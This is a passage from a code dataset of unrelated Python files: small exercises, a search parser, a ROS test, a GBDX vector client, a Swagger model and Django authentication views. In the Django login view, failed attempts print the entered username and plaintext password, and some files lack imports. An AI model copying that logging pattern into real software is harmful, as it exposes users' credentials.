filters.\n :type params: dict\n :return: Processed API response\n :rtype: list of dict\n \"\"\"\n if params is None:\n params = dict()\n params[\"filter[createdAt-start]\"] = date\n return await self.matches(region, params)\n","sub_path":"api/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"561758466","text":"\n\"\"\"\nFaça um programa que tenha uma função chamada área(), que \nreceba as dimesões de um terreno retangular(largura e comprimento) e \nmostre a área do terreno\n\"\"\"\n\ndef area(a, b):\n s = a * b\n print(f'A área de um terreno {a}x{b} é de {s}m².')\n\n\nprint('Controle de Terrenos:^8')\nprint('-'*30)\n\na = float(input('LARGURA (m): '))\nb = float(input('COMPRIMENTO (m): '))\narea(a, b)\n\n","sub_path":"Exercicio #96.py","file_name":"Exercicio #96.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"247839257","text":"# Implement a class to hold room information. This should have name and\n# description attributes.\nimport random\n\n\nclass Room:\n\n def __init__(self, title, desc, itemDrop):\n self.title = title\n self.desc = desc\n self.droppedItem = None\n self.itemDrop = itemDrop\n self.n_to = None\n self.e_to = None\n self.s_to = None\n self.w_to = None\n\n def __str__(self):\n return f\"\\n\\n--{self.title}-- \\n{self.desc} \\n\"\n \n","sub_path":"src/days-2-4-adv/room.py","file_name":"room.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"438578685","text":"from google.appengine.api import users\nfrom google.appengine.ext import ndb\n\n# Every data store has a primary key called an entity key\n# unlike a primary key in relational databases, entity keys\n# are permanent and can only be set when the entity is created. \n# it is unique across all entities in the system\n# App can set the key name (only one component of the key) to \n# an arbitrary value\n\nclass UserPrefs(ndb.Model):\n\ttz_offset = ndb.FloatProperty(default=0.0)\n\tuser = ndb.UserProperty(auto_current_user_add=True)\n\n# gets the userprefs and determines the user id\n# constructs the data store key for an entity of the kind\n# UserPrefs with a key name equivalent to the user ID.\n# if the entity exists it returns the object otherwise\n# it creates the object with default settings and a key\n# name corresponding to the user\n# put must be invoked to save the new key\ndef get_userprefs(user_id=None):\n\tif not user_id:\n\t\tuser = users.get_current_user()\n\t\tif not user:\n\t\t\treturn None\n\t\tuser_id = user.user_id()\n\n\tkey = ndb.Key('UserPrefs', user_id)\n\tuserprefs = key.get()\n\tif not userprefs:\n\t\tuserprefs = UserPrefs(id=user_id)\n\treturn userprefs","sub_path":"cs496-week1-1266/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"396039273","text":"\nfrom pagination import paginacija\nfrom parserTrie.findset import *\n\nfrom set import *\nfrom parserTrie.Tree import *\nimport fnmatch, re\nfrom ucitavanePodata import popunjavanjeStruktura\n\n# function to get unique values\ndef unique(list1):\n # intilize a null list\n unique_list = []\n\n # traverse for all elements\n for x in list1:\n # check if exists in unique_list or not\n if x not in unique_list:\n unique_list.append(x)\n return unique_list\n\ndef pretraga(unesene_reci,stablo,unos):\n globalResultSet = Set('')\n skupoviHTMLstranica = []\n if 'and' in unesene_reci:\n if len(unesene_reci) == 3:\n index = unesene_reci.index('and')\n unesene_reci.remove('and')\n \"\"\"\n Preko indeksa znam koja 2 elementa iz liste, trebaju obavezno da budu prilikom pretrage.\n t1,t2 - Cuvamo dvojku [uspesnost_trazenja, broj_pojavljivanja]\n \"\"\"\n t1 = find_prefix(stablo.root, unesene_reci[index - 1])\n t2 = find_prefix(stablo.root, unesene_reci[index])\n\n # for e in t1[2]:\n # print(e)\n\n if (t1[0] == True and t2[0] == True):\n #set1 = nadjiSet(unos, unesene_reci[index - 1])\n #set2 = nadjiSet(unos, unesene_reci[index])\n\n set1 = t1[2]\n set2 = t2[2]\n skupoviHTMLstranica.append(set1)\n skupoviHTMLstranica.append(set2)\n\n #resultSet = set1.intersection(set2)\n resultSet = set1 & set2\n globalResultSet = resultSet\n #paginacija(resultSet)\n else:\n print(\"Error: Nisu se obe reci pojavile!!\")\n else:\n print(\"Error: Nije unesena validna pretraga sa and operatorom\")\n elif 'not' in unesene_reci:\n if len(unesene_reci) == 3:\n index = unesene_reci.index('not')\n unesene_reci.remove('not')\n\n t1 = find_prefix(stablo.root, unesene_reci[index - 1])\n t2 = find_prefix(stablo.root, unesene_reci[index])\n\n # set1 = nadjiSet(unos, unesene_reci[index - 1])\n # set2 = nadjiSet(unos, unesene_reci[index])\n set1 = t1[2]\n set2 = t2[2]\n\n skupoviHTMLstranica.append(set1)\n skupoviHTMLstranica.append(set2)\n resultSet = set1 - set2\n #resultSet = set1.complement(set2)\n globalResultSet = resultSet\n\n #paginacija(resultSet)\n else:\n print(\"Error: Nije unesena validna pretraga sa not operatorom\")\n elif 'or' in unesene_reci:\n if len(unesene_reci) == 3:\n index = unesene_reci.index('or')\n unesene_reci.remove('or')\n\n t1 = find_prefix(stablo.root, unesene_reci[index - 1])\n t2 = find_prefix(stablo.root, unesene_reci[index])\n if (t1[0] == True or t2[0] == True):\n # set1 = nadjiSet(unos,unesene_reci[index-1])\n # set2 = nadjiSet(unos,unesene_reci[index])\n t1 = find_prefix(stablo.root, unesene_reci[index - 1])\n t2 = find_prefix(stablo.root, unesene_reci[index])\n set1 = t1[2]\n set2 = t2[2]\n\n skupoviHTMLstranica.append(set1)\n skupoviHTMLstranica.append(set2)\n\n resultSet = set1.union(set2)\n globalResultSet = resultSet\n else:\n print(\"Error: Obe reci se uopste nisu pojavile!!\")\n else:\n print(\"Error: Nije unesena validna pretraga sa or operatorom\")\n\n else:\n resultSet = Set('')\n pojavljivane_reci = []\n unesene_reci = unique(unesene_reci)\n for i in range(len(unesene_reci)):\n t = find_prefix(stablo.root, unesene_reci[i])\n if (t[0] == True):\n pojavljivane_reci.append(unesene_reci[i])\n\n #set = nadjiSet(unos,unesene_reci[i])\n set = t[2]\n\n skupoviHTMLstranica.append(set)\n resultSet = resultSet | set\n #resultSet = resultSet.union(set)\n\n globalResultSet = resultSet\n\n return globalResultSet\n\ndef unosPutanje():\n unos = ''\n # petlja ce da se izvrsava sve dok korisnik ne unese nesto\n while unos == '':\n regexPattern1 = fnmatch.translate('[A-Z]:\\*')\n regexPattern2 = fnmatch.translate('/*')\n # Kompajlujemo objekat na kom kasnije mozemo da vrsimo regex metode\n regexObj1 = re.compile(regexPattern1)\n regexObj2 = re.compile(regexPattern2)\n print(\"Unesite putanju korenskog direktorijuma u okviru kojeg zelite da pretrazujete:\")\n unos = input()\n if unos != '': # Mora prvo ova provera zato sto regex.match puca ako mu se prosledi prazan string\n if regexObj1.match(unos) or regexObj2.match(unos):\n print(\"Please wait...\")\n # stablo = loadTrieViaHTML(unos)\n stablo, g, setSvihDatoteka, recnikStranicaReci,dokumentiKojiImajuLinkKaDokumentu,bekLinkovi = popunjavanjeStruktura(unos)\n # g = loadGraphFromParser(unos)\n\n else:\n print(\"Putanja nije validna!\")\n unos = ''\n return stablo,g,setSvihDatoteka,recnikStranicaReci, unos, dokumentiKojiImajuLinkKaDokumentu, bekLinkovi\n\ndef unosProstePretrage():\n unosUpit = ''\n # petlja ce da se izvrsava sve dok korisnik ne unese nesto\n while unosUpit == '':\n # Kompajlujemo objekat na kom kasnije mozemo da vrsimo regex metode\n regexObj111 = re.compile(\"(([\\w]+\\s){1}(and|or|not){1}(\\s[\\w]+){1})|([\\w\\s]+)\")\n\n unosUpit = input(\"Unesite pretragu:\")\n unosUpit = unosUpit.strip().lower()\n if unosUpit != '': # Mora prvo ova provera zato sto regex.match puca ako mu se prosledi prazan string\n if regexObj111.fullmatch(unosUpit):\n print(\"Please wait...\")\n else:\n print(\"Niste uneli validnu pretragu!\")\n unosUpit = ''\n\n unesene_reci = unosUpit.split()\n return unesene_reci","sub_path":"SearchEngine/unos.py","file_name":"unos.py","file_ext":"py","file_size_in_byte":6100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"188957808","text":"import json\n\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom topic.models import Topic\nfrom tools.logging_dec import logging_check\nfrom message.models import Message\n\n\n# 异常码 10400-10499\n\n# Create your views here.\n@logging_check\ndef message_view(request, topic_id):\n user = request.myuser\n json_str = request.body\n json_obj = json.loads(json_str)\n content = json_obj['content']\n parent_id = json_obj.get('parent_id', 0)\n try:\n topic = Topic.objects.get(id=topic_id)\n except Exception as e:\n result = {'code': 10400, 'error': 'The topic is not existed'}\n return JsonResponse(result)\n\n Message.objects.create(topic=topic, content=content, parent_message=parent_id, publisher=user)\n return JsonResponse({'code': 200})\n","sub_path":"笔记/Day01/dadalog/message/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"542476590","text":"#!/usr/bin/env python\n#\n#\n##############################################################################\n# Imports\n##############################################################################\n# Software License Agreement (BSD License)\n#\n# Copyright (c) 2018, Soy Robotics, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# * Neither the name of Soy Robotics, Inc. nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n#\n# Author: Carl Zhang\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom math import copysign, sqrt, pow\n\nclass LinearSpeed(object):\n def __init__(self, cmd_vel_topic):\n self.cmd_vel_publisher = rospy.Publisher(cmd_vel_topic, Twist, queue_size=10)\n self.rate = rospy.Rate(50)\n\n self.ok = True\n self._stop = False\n self._running = False\n\n self._linear_speed = 0.2\n\n def init(self, linear_speed):\n self._linear_speed = linear_speed\n\n def shutdown(self):\n self.stop()\n while self._running:\n self.rate.sleep()\n rospy.loginfo(\"Stopping the robot, Test finished...\")\n self.cmd_vel_publisher.unregister()\n\n def change_topic(self, cmd_vel_topic):\n self.cmd_vel_publisher = rospy.Publisher(cmd_vel_topic, Twist, queue_size=10)\n\n def stop(self):\n self._stop = True\n\n def command(self, twist):\n if self._stop or rospy.is_shutdown():\n return False\n self.cmd_vel_publisher.publish(twist)\n self.rate.sleep()\n return True\n\n def go(self):\n twist = Twist()\n while self.ok:\n twist.linear.x = self._linear_speed\n if not self.command(twist):\n return False\n return True\n\n def execute_speed(self):\n if self._running:\n rospy.logerr(\"Sleo TestSuite: already executing linear error test, ignoring the request\")\n return\n self._stop = False\n self._running = True\n while True:\n if not self.go() :\n break\n\n self._running = False\n if not rospy.is_shutdown():\n cmd = Twist()\n cmd.linear.x = 0.0\n self.cmd_vel_publisher.publish(cmd)\n\n","sub_path":"sleo_desktop/sleo_testsuite/src/sleo_testsuite/linear_speed.py","file_name":"linear_speed.py","file_ext":"py","file_size_in_byte":3582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"50922588","text":"# -*- coding: utf-8 -*-\nimport datetime\nfrom odoo import api, models, _\nfrom odoo.tools.safe_eval import safe_eval\n#\n# Use period and Journal for selection or resources\n#\n\n\nclass ir_needaction_mixin(models.AbstractModel):\n _name = 'ir.needaction_mixin'\n _needaction = True\n\n #------------------------------------------------------\n # Addons API\n #------------------------------------------------------\n\n def _needaction_domain_get(self, cr, uid, context=None):\n \"\"\" Returns the domain to filter records that require an action\n :return: domain or False is no action\n \"\"\"\n return False\n\n #------------------------------------------------------\n # \"Need action\" API\n #------------------------------------------------------\n\n def _needaction_count(self, cr, uid, domain=None, context=None):\n \"\"\" Get the number of actions uid has to perform. \"\"\"\n dom = self._needaction_domain_get(cr, uid, context=context)\n if not dom:\n return 0\n res = self.search(cr, uid, (domain or []) + dom, limit=100, order='id DESC', context=context)\n return len(res)\n","sub_path":"badge_menu/models/ir_needaction.py","file_name":"ir_needaction.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"96744162","text":"\"\"\"\nHangman.\n\nAuthors: Hannah Meisner, Alyssa Taylor, Kaitlyn Wike.\n\"\"\" # DONE: 1. PUT YOUR NAME IN THE ABOVE LINE.\n\n# DONE: 2. Implement Hangman using your Iterative Enhancement Plan.\n\n####### Do NOT attempt this assignment before class! #######\n\nimport random\n\n\ndef main():\n #Welcome\n print('HELLO!!')\n name = str(input('Whats your name: '))\n length = int(input('Enter MAXIMUM length for secret word:'))\n\n correct = ''\n for k in range(length):\n correct = correct + '-'\n\n tries = int(input('How many guesses do you want?'))\n triesLeft = tries\n word = random_word(length)\n guessedLetters = ''\n\n while triesLeft > 0:\n letter = guess(guessedLetters)\n guessedLetters = guessedLetters + letter\n triesLeft = checker(letter, word, triesLeft)\n correct = known(word, correct, letter)\n print(correct)\n if correct == word:\n print(\"You got it\", name + \"! Enjoy your prize of... nothing!\")\n triesLeft = 0\n\n if correct != word:\n print(\"You lose\", name + \"! Outsmarted by a computer...\")\n\n print(\"The word was:\", word)\n\n\ndef random_word(length):\n with open('words.txt') as f:\n f.readline()\n string = f.read()\n words = string.split()\n\n while True:\n word = words[random.randrange(0, len(words))]\n if len(word) <= length:\n break\n\n return word\n\n\ndef guess(guessedLetters):\n letter = str(input('Enter your guess:'))\n while letter in guessedLetters:\n print(\"You already guessed that letter. Try again!\")\n letter = letter = str(input('Enter your guess:'))\n\n return letter\n\ndef checker(letter, word, triesLeft):\n if letter in word:\n print('Guess Correct! You have', triesLeft, 'guess(es) remaining.')\n else:\n triesLeft = triesLeft - 1\n print('Incorrect! You have', triesLeft, 'guess(es) remaining.')\n\n return triesLeft\n\n\ndef known(word, correct, letter):\n new_correct = ''\n for k in range(len(word)):\n if correct[k] != '-':\n new_correct = new_correct + correct[k]\n elif word[k] == letter:\n new_correct = new_correct + word[k]\n else:\n new_correct = new_correct + '-'\n\n correct = new_correct\n return correct\nmain()","sub_path":"src/m1_hangman.py","file_name":"m1_hangman.py","file_ext":"py","file_size_in_byte":2298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"550199918","text":"import os\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import fbeta_score\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\ntrain_file = os.path.join('data', 'train.tsv')\ntest_file = os.path.join('data', 'test.tsv')\nresults_file = os.path.join('data', 'results.tsv')\noutput_file = os.path.join('data', 'out.tsv')\n\ndf_test_names = ['Date',\n 'Temperature',\n 'Humidity',\n 'Light',\n 'CO2',\n 'HumidityRatio']\n\ndf_test = pd.read_csv(test_file, sep='\\t', names=df_test_names)\ndf_test = df_test.dropna()\n\ndf_train_names = ['Occupancy',\n 'Date',\n 'Temperature',\n 'Humidity',\n 'Light',\n 'CO2',\n 'HumidityRatio']\n\ndf_train = pd.read_csv(train_file, sep='\\t', names=df_train_names)\ndf_train = df_train.dropna()\n\n# one variable\nx_train = df_train[['Light']]\n# x_train = df_train[['CO2']]\ny_train = df_train.Occupancy\n\nx_test = df_test[['Light']]\n# x_test = df_test[['CO2']]\ny_test = pd.read_csv(results_file, sep='\\t', names=['Occupancy']).Occupancy\n\n\nl_reg = LogisticRegression()\nl_reg.fit(x_train, y_train)\ny_train_pred = l_reg.predict(x_train)\ny_test_pred = l_reg.predict(x_test)\n\ntrain_conf_matrix = confusion_matrix(y_train, y_train_pred)\ntest_conf_matrix = confusion_matrix(y_test, y_test_pred)\ntp_train, fp_train, fn_train, tn_train = train_conf_matrix.ravel()\ntp_test, fp_test, fn_test, tn_test = test_conf_matrix.ravel()\n\n# train_accuracy = accuracy_score(y_train, y_train_pred)\n# train_accuracy = sum(y_train == y_train_pred) / len(y_train_pred)\ntrain_accuracy = (tp_train+tn_train) / (sum(train_conf_matrix.ravel()))\ntrain_sensitivity = tp_train / (tp_train + fn_train)\ntrain_specificity = tn_train / (fp_train + tn_train)\n\n# test_accuracy = accuracy_score(y_test, y_test_pred)\n# test_accuracy = sum(y_test == y_test_pred) / len(y_test_pred)\ntest_accuracy = accuracy_score(y_test, y_test_pred)\ntest_sensitivity = tp_test / (tp_test + fn_test)\ntest_specificity = tn_test / (fp_test + tn_test)\n\n# all variables\nx_train_all = df_train[['Temperature',\n 'Humidity',\n 'Light',\n 'CO2',\n 'HumidityRatio']]\nx_test_all = df_test[['Temperature',\n 'Humidity',\n 'Light',\n 'CO2',\n 'HumidityRatio']]\n\nl_reg_all = LogisticRegression()\nl_reg_all.fit(x_train_all, y_train)\ny_train_pred_all = l_reg_all.predict(x_train_all)\ny_test_pred_all = l_reg_all.predict(x_test_all)\n\ntrain_conf_matrix_all = confusion_matrix(y_train, y_train_pred_all)\ntest_conf_matrix_all = confusion_matrix(y_test, y_test_pred_all)\n\ntp_train_all, fp_train_all, fn_train_all, tn_train_all = \\\n train_conf_matrix_all.ravel()\n\ntp_test_all, fp_test_all, fn_test_all, tn_test_all = \\\n test_conf_matrix_all.ravel()\n\ntrain_accuracy_all = (tp_train_all+tn_train_all) \\\n / (sum(train_conf_matrix_all.ravel()))\ntrain_sensitivity_all = tp_train_all / (tp_train_all + fn_train_all)\ntrain_specificity_all = tn_train_all / (fp_train_all + tn_train_all)\n\ntest_accuracy_all = accuracy_score(y_test, y_test_pred_all)\ntest_sensitivity_all = tp_test_all / (tp_test_all + fn_test_all)\ntest_specificity_all = tn_test_all / (fp_test_all + tn_test_all)\n\npd.DataFrame(y_test_pred).to_csv(output_file, index=False, header=False)\n\n# f score\n# beta value for a: <1 precision more important\n# beta value for b: >1 recall more important\n\n# one var\nf1_train = f1_score(y_train, y_train_pred)\nf1_test = f1_score(y_test, y_test_pred)\nf1_beta_a_test = fbeta_score(y_test, y_test_pred, beta=0.2)\nf1_beta_b_test = fbeta_score(y_test, y_test_pred, beta=10)\nf1_beta_a_train = fbeta_score(y_train, y_train_pred, beta=0.2)\nf1_beta_b_train = fbeta_score(y_train, y_train_pred, beta=10)\n\n# all var\nf1_train_all = f1_score(y_train, y_train_pred_all)\nf1_test_all = f1_score(y_test, y_test_pred_all)\nf1_beta_a_test_all = fbeta_score(y_test, y_test_pred_all, beta=0.2)\nf1_beta_b_test_all = fbeta_score(y_test, y_test_pred_all, beta=10)\nf1_beta_a_train_all = fbeta_score(y_train, y_train_pred_all, beta=0.2)\nf1_beta_b_train_all = fbeta_score(y_train, y_train_pred_all, beta=10)\n","sub_path":"UCZMZad3_1.py","file_name":"UCZMZad3_1.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"558662239","text":"\"\"\"\nGBDX Vector Services Interface.\n\nContact: nate.ricklin@digitalglobe.com\n\"\"\"\n#from __future__ import absolute_import\nfrom builtins import object\n\nimport requests\nfrom pygeoif import geometry\nfrom geomet import wkt as wkt2geojson\nimport json\n\nfrom gbdxtools.auth import Auth\n\nclass Vectors(object):\n\n def __init__(self, **kwargs):\n ''' Construct the Vectors interface class\n\n Returns:\n An instance of the Vectors interface class.\n '''\n interface = Auth(**kwargs)\n self.gbdx_connection = interface.gbdx_connection\n self.logger = interface.logger\n self.query_url = 'https://vector.geobigdata.io/insight-vector/api/vectors/query/paging'\n self.page_url = 'https://vector.geobigdata.io/insight-vector/api/vectors/paging'\n self.get_url = 'https://vector.geobigdata.io/insight-vector/api/vector/%s/'\n self.create_url = 'https://vector.geobigdata.io/insight-vector/api/vectors'\n\n def create(self,vectors):\n \"\"\"\n Create a vectors in the vector service.\n\n Args:\n vectors: A single geojson vector or a list of geojson vectors. Each looks like:\n {\n \"type\": \"Feature\",\n \"geometry\": {\n \"type\": \"Point\",\n \"coordinates\": [1.0,1.0]\n },\n \"properties\": {\n \"text\" : \"item text\",\n \"name\" : \"item name\",\n \"item_type\" : \"type\",\n \"ingest_source\" : \"source\",\n \"attributes\" : {\n \"latitude\" : 1,\n \"institute_founded\" : \"2015-07-17\",\n \"mascot\" : \"moth\"\n }\n }\n }\n\n item_type and ingest_source are required.\n\n Returns:\n a list of IDs of the vectors created\n \"\"\"\n if type(vectors) is dict:\n vectors = [vectors]\n\n # validate they all have item_type and ingest_source in properties\n for vector in vectors:\n if not 'properties' in list(vector.keys()):\n raise Exception('Vector does not contain \"properties\" field.')\n\n if not 'item_type' in list(vector['properties'].keys()):\n raise Exception('Vector does not contain \"item_type\".')\n\n if not 'ingest_source' in list(vector['properties'].keys()):\n raise Exception('Vector does not contain \"ingest_source\".')\n\n r = self.gbdx_connection.post(self.create_url, data=json.dumps(vectors))\n r.raise_for_status()\n return r.json()\n\n def create_from_wkt(self, wkt, item_type, ingest_source, **attributes):\n '''\n Create a single vector in the vector service\n\n Args:\n wkt (str): wkt representation of the geometry\n item_type (str): item_type of the vector\n ingest_source (str): source of the vector\n attributes: a set of key-value pairs of attributes\n\n Returns:\n id (str): string identifier of the vector created\n '''\n # verify the \"depth\" of the attributes is single layer\n\n geojson = wkt2geojson.loads(wkt)\n vector = {\n 'type': \"Feature\",\n 'geometry': geojson,\n 'properties': {\n 'item_type': item_type,\n 'ingest_source': ingest_source,\n 'attributes': attributes\n }\n }\n\n return self.create(vector)[0]\n\n\n def get(self, ID, index='vector-web-s'):\n '''Retrieves a vector. Not usually necessary because searching is the best way to find & get stuff.\n\n Args:\n ID (str): ID of the vector object\n index (str): Optional. Index the object lives in. defaults to 'vector-web-s'\n\n Returns:\n record (dict): A dict object identical to the json representation of the catalog record\n '''\n\n url = self.get_url % index\n r = self.gbdx_connection.get(url + ID)\n r.raise_for_status()\n return r.json()\n\n\n def query(self, searchAreaWkt, query, count=100, ttl='5m'):\n '''\n Perform a vector services query using the QUERY API\n (https://gbdxdocs.digitalglobe.com/docs/vs-query-list-vector-items-returns-default-fields)\n\n Args:\n searchAreaWkt: WKT Polygon of area to search\n query: Elastic Search query\n count: Maximum number of results to return\n ttl: Amount of time for each temporary vector page to exist\n\n Returns:\n List of vector results\n \n '''\n\n return list(self.query_iteratively(searchAreaWkt, query, count, ttl))\n\n\n def query_iteratively(self, searchAreaWkt, query, count=100, ttl='5m'):\n '''\n Perform a vector services query using the QUERY API\n (https://gbdxdocs.digitalglobe.com/docs/vs-query-list-vector-items-returns-default-fields)\n\n Args:\n searchAreaWkt: WKT Polygon of area to search\n query: Elastic Search query\n count: Maximum number of results to return\n ttl: Amount of time for each temporary vector page to exist\n\n Returns:\n generator of vector results\n \n '''\n\n search_area_polygon = geometry.from_wkt(searchAreaWkt)\n left, lower, right, upper = search_area_polygon.bounds\n\n params = {\n \"q\": query,\n \"count\": count,\n \"ttl\": ttl,\n \"left\": left,\n \"right\": right,\n \"lower\": lower,\n \"upper\": upper\n }\n\n # initialize paging request\n r = self.gbdx_connection.get(self.query_url, params=params)\n r.raise_for_status()\n page = r.json()\n paging_id = page['next_paging_id']\n item_count = int(page['item_count'])\n data = page['data']\n\n for vector in data:\n yield vector\n\n # get vectors from each page\n while paging_id and item_count > 0:\n\n headers = {'Content-Type':'application/x-www-form-urlencoded'}\n data = {\n \"pagingId\": paging_id,\n \"ttl\": ttl\n }\n\n r = self.gbdx_connection.post(self.page_url, headers=headers, data=data)\n r.raise_for_status()\n page = r.json()\n paging_id = page['next_paging_id']\n item_count = int(page['item_count'])\n data = page['data']\n\n for vector in data:\n yield vector\n\n\n\n\n\n\n","sub_path":"gbdxtools/vectors.py","file_name":"vectors.py","file_ext":"py","file_size_in_byte":6533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"339142769","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server import util\n\n\nclass UserList(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, user: List[UserInfo]=None, resource_url: ResourceURL=None): # noqa: E501\n \"\"\"UserList - a model defined in Swagger\n\n :param user: The user of this UserList. # noqa: E501\n :type user: List[UserInfo]\n :param resource_url: The resource_url of this UserList. # noqa: E501\n :type resource_url: ResourceURL\n \"\"\"\n self.swagger_types = {\n 'user': List[UserInfo],\n 'resource_url': ResourceURL\n }\n\n self.attribute_map = {\n 'user': 'user',\n 'resource_url': 'resourceURL'\n }\n\n self._user = user\n self._resource_url = resource_url\n\n @classmethod\n def from_dict(cls, dikt) -> 'UserList':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The UserList of this UserList. # noqa: E501\n :rtype: UserList\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def user(self) -> List[UserInfo]:\n \"\"\"Gets the user of this UserList.\n\n Collection of the zone information list. # noqa: E501\n\n :return: The user of this UserList.\n :rtype: List[UserInfo]\n \"\"\"\n return self._user\n\n @user.setter\n def user(self, user: List[UserInfo]):\n \"\"\"Sets the user of this UserList.\n\n Collection of the zone information list. # noqa: E501\n\n :param user: The user of this UserList.\n :type user: List[UserInfo]\n \"\"\"\n\n self._user = user\n\n @property\n def resource_url(self) -> ResourceURL:\n \"\"\"Gets the resource_url of this UserList.\n\n\n :return: The resource_url of this UserList.\n :rtype: ResourceURL\n \"\"\"\n return self._resource_url\n\n @resource_url.setter\n def resource_url(self, resource_url: ResourceURL):\n \"\"\"Sets the resource_url of this UserList.\n\n\n :param resource_url: The resource_url of this UserList.\n :type resource_url: ResourceURL\n \"\"\"\n if resource_url is None:\n raise ValueError(\"Invalid value for `resource_url`, must not be `None`\") # noqa: E501\n\n self._resource_url = resource_url\n","sub_path":"locationAPI/server/swagger_server/models/user_list.py","file_name":"user_list.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"341751746","text":"from django.shortcuts import render,redirect\r\n\r\nfrom eventapp.forms import UserForm,UserProfileInfoForm\r\n\r\nfrom django.contrib.auth import authenticate, login, logout\r\n\r\nfrom django.http import HttpResponseRedirect, HttpResponse\r\n\r\nfrom django.contrib.auth.models import User\r\n\r\nfrom mysite.core.forms import SignUpForm\r\n\r\nfrom django.contrib.auth.decorators import login_required\r\n\r\n\r\ndef index(request):\r\n return render(request,'eventapp/index.html')\r\n@login_required\r\ndef special(request):\r\n return HttpResponse(\"You are logged in !\")\r\n@login_required\r\n\r\ndef user_logout(request):\r\n logout(request)\r\n return HttpResponseRedirect(reverse('index'))\r\n\r\ndef register(request):\r\n registered = False\r\n if request.method == 'POST':\r\n user_form = UserForm(data=request.POST)\r\n profile_form = UserProfileInfoForm(data=request.POST)\r\n if user_form.is_valid() and profile_form.is_valid():\r\n user = user_form.save()\r\n user.set_password(user.password)\r\n user.save()\r\n profile = profile_form.save(commit=False)\r\n profile.user = user\r\n if 'profile_pic' in request.FILES:\r\n print('found it')\r\n profile.profile_pic = request.FILES['profile_pic']\r\n profile.save()\r\n registered = True\r\n else:\r\n print(user_form.errors,profile_form.errors)\r\n else:\r\n user_form = UserForm()\r\n profile_form = UserProfileInfoForm()\r\n return render(request,'eventapp/registration.html',\r\n {'user_form':user_form,\r\n 'profile_form':profile_form,\r\n 'registered':registered})\r\ndef user_login(request):\r\n if request.method == 'POST':\r\n username = request.POST.get('username')\r\n password = request.POST.get('password')\r\n user = authenticate(username=username, password=password)\r\n if user:\r\n if user.is_active:\r\n login(request,user)\r\n return HttpResponseRedirect(reverse('index'))\r\n else:\r\n return HttpResponse(\"Your account was inactive.\")\r\n else:\r\n print(\"Someone tried to login and failed.\")\r\n print(\"They used username: {} and password: {}\".format(username,password))\r\n return HttpResponse(\"Invalid login details given\")\r\n else:\r\n return render(request, 'eventapp/login.html', {})\r\n\r\n\r\n\r\ndef signup(request):\r\n if request.method == 'POST':\r\n form = SignUpForm(request.POST)\r\n if form.is_valid():\r\n user = form.save()\r\n user.is_active = False\r\n user.save()\r\n current_site = get_current_site(request)\r\n subject = 'Activate Your eventapp'\r\n message = 